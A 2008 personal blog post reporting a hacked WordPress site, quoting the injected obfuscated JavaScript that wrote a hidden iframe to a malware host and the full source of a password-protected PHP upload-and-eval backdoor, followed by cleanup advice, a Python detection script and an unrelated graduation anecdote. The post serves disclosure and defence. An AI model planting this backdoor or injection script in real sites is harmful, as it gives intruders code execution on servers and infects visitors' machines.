Where I don't care what others think

Virii Warning

June 2nd, 2008 Posted in Uncategorized

Fast news coming down from my blog updates: if you’ve visited this site in Internet Explorer in the past week, there is a chance you may have gotten a virus. Instead of my usual writings, you would have found a blank page with nothing there. Firefox seems to be smart enough to avoid doing anything, but IE might have downloaded a bad file. The file would be in your Temporary Internet Files, likely called wp-stats[1].htm. If you do feel you might have downloaded this virus, please run a virus scanning program. The Symantec Security Response page is here with more information about the file (at least as my computer caught it).

Essentially several of my pages had some JavaScript inserted into them that generated an iframe to pull files off another site. My first thought was SQL injection, because blogs tend to be susceptible to those types of things, but phpMyAdmin showed a clean database. I started going through all my files in FTP and found this strange chunk of code:

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Essentially all that obfuscation does is hide the iframe, and with it the real purpose of the JavaScript: every character of the string has been shifted up by 2, and count() shifts it back before document.write() drops the tag into the page. I deleted it from all the files it was in (which was several) and started to figure out how they got there. I’m not 100% sure, but I did find several files that did not belong, all named like net_[wordpress filename].php. A good example is net_wp-comments.php. I opened that file up, and it was definitely malicious… it would take a file sent from a form and write that file to the current directory (and, given a second upload, run it with eval).

<?php
// Dropper found as net_wp-comments.php. The @ in front of a call suppresses
// its error output; $HTTP_POST_FILES is the PHP 4 name for $_FILES.
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;

// MD5 of the password the operator must send in POST parameter "p".
define('PASSWD','46fe61e5238b5a873dab30ace493d58d');

function say($t) {
    echo "$t\n";
};

// Status markers are emitted as md5("mark_<status>") rather than plain text.
function testdata($t) {
    say(md5("mark_$t"));
};

echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == PASSWD) {
    // Upload "s": written as-is into this script's directory under its
    // original filename. This is how further copies get planted.
    if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
                       $HTTP_POST_FILES["s"]["size"])) {
        if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
        {
            testdata('save_ok');
        };
        //eval($code);
    } else {
        testdata('save_fail');
    };

    // Upload "f": executed as PHP in this process without being saved.
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
                       $HTTP_POST_FILES["f"]["size"]))
    {
        eval($code);
        testdata('ok');
    } else {
        testdata('fail');
    };

} else {
    testdata('pass');
};

testdata('end');
echo "</pre>";
?>

I imagine once one of these got in, it was used to write several other copies. I also found a “hidden” directory serving what looked like search engine gaming stuff. I put hidden in quotes because my FileZilla didn’t understand that the leading . in the name was meant to hide it, but I caught it. I think we’re clean for now.

If your blog is sending people to a blank page, and you can see your browser status bar connecting to wp-stats-php.info, you are infected. I would turn off your index.php page (rename it to something else so people can’t get to your site) and scour every file for the malicious JavaScript. I found all the files modified at the same date/time, and the code was always at the bottom of a PHP file. I would also look for any files that don’t belong in a WordPress install, like having a net_wp-stat.php in addition to the wp-stat.php. If you open those files up in a text editor and scroll down (the text is placed very far down, close to the middle) you’ll see lots of lines that start with @, which suppresses any error output from that call. You’ll want to delete those files. Mine looked like it had some password protection on it (an MD5 of a password sent in the POST, as in the script above, rather than HTTP authentication), where the hash was “dc696e9e1af6d06e67a526de29b37e54”.

The safest way to address this may be to back up your database, blow away your WordPress install, and start from scratch. If you’re like me and lack a backup, try to clean any files in wp-admin, as well as your wp-config files, and see if you can generate a backup/export from your admin interface. Use Firefox when you do this! It looked like the file uploaders joined my directories back in April (or so the modified date indicates), but they weren’t used until Friday to overwrite my content.
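As an added example (not the blog's or WordPress's own code), here is a small Python triage script that does the checks described above offline, covering both the obfuscated-script chunk shown earlier and the cleanup steps just listed: it decodes the count() char-shift to reveal the iframe, flags net_*.php droppers by their shape (upload plus fwrite/eval plus @-silenced calls), lists dot-directories, and reports the modification minute shared by the most files. The sample site it builds in a temporary directory is constructed: INJECTED_LINE is the injected line quoted above, the dropper is a stand-in of the same shape, and the file names, timestamp and 'constructed-placeholder' hash are assumptions.

```python
import os
import re
import tempfile
from collections import Counter

# Signature of the injection on this page: a count() helper that subtracts a
# constant from each char code and hands the result to document.write().
SHIFT_RE = re.compile(r'String\.fromCharCode\(n\s*-\s*\((\d+)\)\)')
PAYLOAD_RE = re.compile(r'document\.write\(count\("((?:[^"\\]|\\.)*)"\)\)')
SUPPRESSED_CALL_RE = re.compile(r'@[A-Za-z_]+\(')  # @fopen(...): error output silenced

def decode_shifted(payload: str, shift: int) -> str:
    """Undo count(): the payload sits in a PHP single-quoted string, so the
    JS-escaped quote is stored literally as \\" and decodes to a space."""
    return "".join(chr(ord(c) - shift) for c in payload.replace('\\"', '"'))

def hidden_iframes(text: str) -> list:
    """Decoded payloads hidden by the char-shift script; [] if none present."""
    m = SHIFT_RE.search(text)
    if not m:
        return []
    return [decode_shifted(p, int(m.group(1))) for p in PAYLOAD_RE.findall(text)]

def looks_like_dropper(name: str, text: str) -> bool:
    """The net_*.php files: accept an upload, then fwrite() it beside the
    script and/or eval() it, with @ silencing errors on every call."""
    uses_upload = "$HTTP_POST_FILES" in text or "$_FILES" in text
    runs_or_writes = "eval(" in text or "fwrite(" in text
    silenced = len(SUPPRESSED_CALL_RE.findall(text)) >= 3
    return name.startswith("net_") or (uses_upload and runs_or_writes and silenced)

def triage(root: str) -> dict:
    """Walk a WordPress tree: files carrying the injected script (with the decoded
    iframe), dropper candidates, dot-directories, and the modification minute
    shared by the most files (a mass injection lands in one pass)."""
    injected, droppers, dot_dirs, mtimes = {}, [], [], Counter()
    for dirpath, dirnames, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        prefix = "" if rel_dir == "." else rel_dir + "/"
        dot_dirs += [prefix + d for d in dirnames if d.startswith(".")]
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if frames := hidden_iframes(text):
                injected[prefix + name] = frames
            if looks_like_dropper(name, text):
                droppers.append(prefix + name)
            mtimes[int(os.stat(path).st_mtime) // 60] += 1
    minute, count = mtimes.most_common(1)[0] if mtimes else (None, 0)
    return {"injected": injected, "droppers": sorted(droppers), "dot_dirs": sorted(dot_dirs),
            "busiest_minute": minute, "files_in_that_minute": count}

# Constructed sample site. INJECTED_LINE is the line quoted on this page; the
# dropper below is a stand-in of the same shape, not the file from the page.
INJECTED_LINE = (
    "<?php echo '<script type=\"text/javascript\">function count(str){var res = \"\";"
    "for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); "
    "res += String.fromCharCode(n - (2)); } return res; }; "
    "document.write(count(\">khtcog\\\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr"
    "\\\"ykfvj?3\\\"jgkijv?3\\\"htcogdqtfgt?2@\"));</script>';?>"
)
DROPPER = """<?php
@error_reporting(E_ALL);
@set_time_limit(0);
define('PASSWD', 'constructed-placeholder');
if (md5($_POST["p"]) == PASSWD) {
  if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), 4096)) { eval($code); }
}
?>"""
CLEAN = "<?php\necho 'nothing to see here';\n"
STAMP = 1212000000  # constructed epoch time of the mass injection

def build_sample_site(root: str) -> None:
    files = {  # relative path: (content, mtime); dropper and SEO dir are older
        "index.php": (CLEAN + INJECTED_LINE, STAMP),
        "wp-admin/admin.php": (CLEAN + INJECTED_LINE, STAMP),
        "wp-comments-post.php": (CLEAN, STAMP - 90 * 86400),
        "net_wp-comments.php": (DROPPER, STAMP - 45 * 86400),
        "wp-content/.seo/links.php": (CLEAN, STAMP - 60 * 86400),
    }
    for rel, (text, mtime) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)
        os.utime(path, (mtime, mtime))

def run_demo() -> dict:
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return triage(root)

if __name__ == "__main__":
    print(run_demo())
```

Run it as-is to see the sample result; the decoded iframe points at wp-stats-php.info, the only dropper candidate is net_wp-comments.php, and the two injected files share one modification minute. On a real site, call triage() on the document root (ideally on a copy pulled over FTP) and review every hit by hand before deleting anything; the mtime cluster is a hint for where to look, not proof on its own.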

In other news, SHHS had their graduation yesterday. Congraduations to all those who graduated. I am confident you did a great job! The speeches were pretty bad, especially the class president's and the retiring middle school principal's. They both had good things to say, and plenty of nice closing lines. Unfortunately there were too many closing lines per speech; I cannot tolerate more than 1 or 2 closings. Any more than that and I get very frustrated at your attempts to trick me into applauding. You might think your speech is that good, but it's probably not. It didn't help that there was a fire alarm going off in the building behind the graduation site.. at least the fire trucks tried to come quietly.

I had other news to share I think, but I am tired.

2 Responses to “Virii Warning”

By Katie on Jun 3, 2008

Please check my computer dork, I think I have the virus, because that would be my luck. Your page did come up blank for me…so lets me knows!

With love, me

By Charlie on Jun 5, 2008

Make KT use firefox! =)
